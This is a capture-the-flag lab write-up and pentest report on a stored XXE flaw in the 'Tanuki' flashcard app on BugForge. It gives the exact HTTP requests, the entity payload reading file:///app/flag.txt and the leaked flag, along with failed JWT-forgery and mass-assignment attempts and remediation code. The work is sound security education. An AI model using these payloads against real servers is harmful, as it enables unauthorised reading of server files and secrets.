Tanuki: Stored XXE via a Hidden JSON Field
Part 1 — Pentest Report
Executive Summary
Tanuki is a spaced-repetition flashcard application on BugForge, built on an Express backend with a React and Material-UI frontend. Testing identified a stored XML External Entity (XXE) vulnerability in the deck backup and restore feature: the restore endpoint accepts an undocumented JSON field that the backup endpoint splices raw into the DOCTYPE of an XML export, where it is parsed and resolved. This allows arbitrary read of files on the application server.
Testing confirmed 1 finding:
| ID | Title | Severity | CVSS | CWE | Endpoint |
|---|---|---|---|---|---|
| F1 | Stored XXE via undocumented dtd field in deck restore/backup round-trip |
High | 6.5 | CWE-611, CWE-915 | POST /api/decks/:id/restore + GET /api/decks/:id/backup |
F1 is the flag-bearing finding. An attacker with any registered account can write an <!ENTITY> declaration into a deck through the dtd field on restore, then trigger the backup export to have the server resolve that entity against a local file path. The contents of /app/flag.txt were read back inside the exported XML, confirming arbitrary server-side file read.
Objective
Assess the Tanuki flashcard application for web vulnerabilities and recover the engagement flag.
Scope / Initial Access
# Target Application
URL: https://lab-1779238897562-ocx1n6.labs-app.bugforge.io
# Auth details
Registration: POST /api/register {username, email, password, full_name}
returns {token, user}
Session: JWT (HS256), payload {id, username, iat} — no role, no exp claim
Storage: localStorage holds `token` and a `user` object
Starting privileges: standard user (role "user", assigned server-side)
Registration is open and self-service. A new account receives a signed JWT immediately and the role field on the user record defaults to "user". All testing below was performed from a single standard-user account.
Reconnaissance — Reading the Backup Export Format
The application surface was mapped from the React bundle (main.9f7a4f9f.js) and by direct probing of the API. The backup feature stood out: GET /api/decks/:id/backup returns an XML document, and its structure revealed how the server builds that XML.
GET /api/decks/:id/backupreturns an XML export of a deck. The output contains a raw, unescaped&character in the seed deck namePlanets & Moons(rendered as&, not&). Unescaped&in XML output indicates the document is assembled by string templating, not by a real XML builder.- The same output carries a
<!DOCTYPE backup [ ]>wrapper with an empty internal subset. A surviving but empty DOCTYPE indicates the assembled string is parsed and then re-serialized before being returned. - Taken together, observations 1 and 2 describe a string-built, parse-then-reserialize round-trip — the precondition for XXE if any attacker-controlled value reaches the DOCTYPE.
- There is no XML import widget in the frontend bundle. The backup endpoint is download-only from the user-facing flow, which meant the XML-consuming counterpart had to be found by direct probing.
POST /api/decks/:id/backupreturns405 {"error":"Debug: Did you mean /restore?"}. The server itself names the companion endpoint.POST /api/decks/:id/restorereturns200 {"id":N, "message":"Backup restored successfully", "cards_count":N}. This is the write counterpart to the backup export, and it creates a new deck per call.
Application Architecture
| Component | Detail |
|---|---|
| Backend | Express (X-Powered-By: Express) |
| Frontend | React + Material-UI single-page app, bundle main.9f7a4f9f.js |
| Auth | JWT HS256, payload {id, username, iat}, no role claim, no expiry |
| Database | Relational; tables inferred as users, decks, cards, study_sessions |
API Surface
| Endpoint | Method | Auth | Notes |
|---|---|---|---|
| /api/register | POST | No | Open registration, returns JWT |
| /api/login | POST | No | Credential login |
| /api/verify-token | GET | Yes | Returns the persisted user record including role |
| /api/decks/:id/backup | GET | Yes | XML export of a deck (string-templated, parse-reserialized) |
| /api/decks/:id/restore | POST | Yes | JSON deck import, creates a new deck |
| /api/admin/users | GET/POST/PUT/DELETE | Yes (admin) | Role-gated, enforced on every verb |
Attack Chain Visualization
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ Recon: backup │ │ Find the write │ │ POST /restore │ │ GET /backup │
│ XML has raw `&` │──▶│ counterpart: │──▶│ with undocumented│──▶│ splices `dtd` │
│ + empty DOCTYPE │ │ POST .../restore │ │ `dtd` = <!ENTITY>│ │ into DOCTYPE, │
│ = string-built │ │ (405 hints it) │ │ + name = &xxe; │ │ parses, resolves │
└──────────────────┘ └──────────────────┘ └──────────────────┘ └────────┬─────────┘
│
▼
┌──────────────────────┐
│ /app/flag.txt content │
│ returned in <name> │
└──────────────────────┘
Findings
F1 — Stored XXE via undocumented dtd field in deck restore/backup round-trip
Severity: High
CVSS v3.1: 6.5 — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-611 (Improper Restriction of XML External Entity Reference), CWE-915 (Improperly Controlled Modification of Dynamically-Determined Object Attributes)
Endpoint: POST /api/decks/:id/restore (write) + GET /api/decks/:id/backup (trigger)
Authentication required: Yes (any registered user)
Severity note: Raw CVSS math places this at 6.5 Medium. It is rated High here on lab-finding-importance, consistent with the two prior Tanuki XXE engagements (2026-05-08, 2026-05-13). The defect yields arbitrary read of files on the application server, which is the engagement objective.
Description
Two defects compound to produce a stored XXE:
-
The restore endpoint accepts an undocumented field.
POST /api/decks/:id/restoretakes a JSON deck. Beyond the documented{name, description, category, cards}, it also stores an undocumenteddtdfield verbatim on the deck record. The field is not part of the deck schema and is never displayed by the frontend. -
The backup endpoint string-templates the stored
dtdinto a DOCTYPE.GET /api/decks/:id/backupexports a deck as XML by string-templating deck fields into a fixed skeleton without XML-escaping. The storeddtdvalue is spliced raw into the DOCTYPE internal subset:<!DOCTYPE backup [ ${dtd} ]> <backup><name>${name}</name>...The assembled string is then parsed and re-serialized before it is returned. If
dtdcontains an<!ENTITY>declaration and a rendered field such asnamecontains the matching&entity;reference, the parse step resolves the external entity, and the re-serialized output carries the resolved file contents.
The exploit requires both halves: the dtd field carries the entity definition, and a rendered field carries the entity reference so the resolved value is returned to the attacker. This was confirmed by isolation testing — a restore payload with no dtd field leaves &xxe; literal in the output, and of the candidate field names tested (dtd, doctype, entities, entity, xml, header), only dtd triggers resolution.
The empty [ ] internal subset in the backup output is the re-serializer expanding the entity and dropping the now-used declaration. It is the fingerprint of the parse-then-reserialize round-trip, not evidence of a server-defined entity.
Impact
Arbitrary read of files on the application server, available to any registered user.
Reproduction
Step 1 — Register an account to obtain a JWT
POST /api/register HTTP/1.1
Host: lab-1779238897562-ocx1n6.labs-app.bugforge.io
Content-Type: application/json
{"username":"tester","email":"[email protected]","password":"Passw0rd!","full_name":"Test User"}
Response: 200 with {"token":"<jwt>","user":{...}}. Use the token as Authorization: Bearer <jwt> for the next two steps.
Step 2 — Restore a deck carrying the entity definition in dtd
POST /api/decks/1/restore HTTP/1.1
Host: lab-1779238897562-ocx1n6.labs-app.bugforge.io
Authorization: Bearer <jwt>
Content-Type: application/json
{"name":"&xxe;","description":"x","category":"x",
"dtd":"<!ENTITY xxe SYSTEM \"file:///app/flag.txt\">",
"cards":[{"front":"f","back":"b"}]}
Response: 200 {"id":<N>,"message":"Backup restored successfully","cards_count":1}. Note the new deck id <N>.
Step 3 — Trigger the export to resolve the entity
GET /api/decks/<N>/backup HTTP/1.1
Host: lab-1779238897562-ocx1n6.labs-app.bugforge.io
Authorization: Bearer <jwt>
Response: XML with the file contents resolved into the rendered field:
<!DOCTYPE backup [
]>
<backup><name>bug{qHQps5HW84zV5zBRiyLuUhqdsPzDITFN}</name>...
The <name> element contains the contents of /app/flag.txt. Any readable path on the application server can be substituted into the file:// URI.
Remediation
Fix 1 — Drop unknown fields on restore
The restore handler must accept only the documented deck schema. The dtd field should never reach storage.
// BEFORE (Vulnerable) — whole body persisted, including unknown fields
const deck = await Deck.create(req.body);
// AFTER (Secure) — explicit field whitelist
const { name, description, category, cards } = req.body;
const deck = await Deck.create({ name, description, category, cards });
Fix 2 — Build the backup XML with a real serializer, not string templating
String-templating user values into XML allows both unescaped metacharacters and DOCTYPE injection. Use an XML builder that escapes content, and never interpolate any value into a DOCTYPE.
// BEFORE (Vulnerable) — string-templated, no escaping, attacker value in DOCTYPE
const xml = `<!DOCTYPE backup [
${deck.dtd}
]>
<backup><name>${deck.name}</name>...`;
// AFTER (Secure) — builder escapes content; no DOCTYPE emitted
const { create } = require('xmlbuilder2');
const xml = create({ version: '1.0' })
.ele('backup')
.ele('name').txt(deck.name).up()
.ele('description').txt(deck.description).up()
.end({ prettyPrint: true });
Fix 3 — Disable DTD and external-entity processing on the parser
The parse-and-reserialize step should not process DTDs or external entities.
// AFTER (Secure) — libxml2-based parser with DTD/network loading off
const parsed = parseXml(xml, {
dtdload: false, // do not load external DTDs
dtdvalid: false, // do not validate against a DTD
noent: false, // do not substitute entities
nonet: true, // never fetch over the network
});
Additional recommendations:
- Remove the
405debug message that names the/restoreendpoint. - Apply a schema validator (for example, a JSON Schema) to the restore body so the contract is enforced in one place rather than by ad-hoc destructuring.
- The application should not need to read
/app/flag.txt; restrict the runtime user’s filesystem access to only the paths it requires.
OWASP Top 10 Coverage
- A05:2021 — Security Misconfiguration: The XML parser used for the backup round-trip processes DTDs and external entities, which is the root condition for XXE.
- A03:2021 — Injection: The stored
dtdvalue is string-templated directly into the XML document’s DOCTYPE, injecting an attacker-controlled entity declaration into the parsed document. - A04:2021 — Insecure Design: The restore endpoint persists the full request body without a schema, so an undocumented field flows straight to storage and then into the export template.
Tools Used
| Tool | Purpose |
|---|---|
| Browser dev tools | Inspecting the React bundle and mapping the API surface |
| curl / Burp Suite | Crafting the restore and backup requests, isolation testing |
| jwt_tool | Inspecting the JWT structure (no role claim, no expiry) |
References
- CWE-611: Improper Restriction of XML External Entity Reference
- CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
- OWASP XML External Entity Prevention Cheat Sheet
- OWASP Mass Assignment Cheat Sheet
Part 2 — Notes / Knowledge
Key Learnings
-
An export endpoint’s output is recon for how that XML is built. When a backup or download endpoint emits XML with an unescaped
&and a surviving<!DOCTYPE>wrapper, the server is string-templating XML and parsing it back rather than using a real XML builder. That pairing marks a write-then-export round-trip worth attacking: find the endpoint that feeds the export and look for a value that lands inside the DOCTYPE. On Tanuki the seed deckPlanets & Moonsappeared in the backup output with a raw&, and the DOCTYPE survived empty — both tells were visible before a single payload was sent. -
XXE does not require posting XML. The
<!ENTITY>definition can ride in an ordinary JSON field that the server splices into an XML template, with resolution firing on a separate, later export request. When a JSON write endpoint is paired with an XML export, fuzz the write body for undocumented fields (dtd,doctype,xml) and pair them with an&entity;reference in a field the export renders. Here the write was plain JSON to/restoreand the parse happened only when/backupwas called — the two halves of the exploit lived in two different requests.
Failed Approaches
| Approach | Result | Why It Failed |
|---|---|---|
GET /api/admin/users with a standard-user JWT |
403 {"error":"Admin access required"} |
The /api/admin/* route group enforces a role check on every verb; no per-handler drift |
Mass assignment of role on POST /api/register (role, isAdmin, is_admin, combined) |
All silently dropped; verify-token showed role stayed "user" |
Register handler destructures a fixed field whitelist from the body |
JWT forged with alg:none |
403 {"error":"Invalid token"} |
Server enforces the HS256 signature; unsigned tokens rejected |
XXE by posting raw XML to /restore (application/xml, text/xml, text/plain, JSON-wrapped XML) |
200 with deck name "Untitled Deck", cards_count:0 |
The restore handler parses only JSON; non-JSON bodies fail to parse and the handler defaults silently. The XML had to be delivered through the JSON dtd field instead |
| File-upload XXE | No upload widget in the frontend bundle | The backup feature is download-only; the XML-consuming path is the JSON /restore endpoint, found by probing |
Tags: #xxe #xml-external-entity #mass-assignment #stored #bugforge #webapp
Document Version: 1.0
Last Updated: 2026-05-20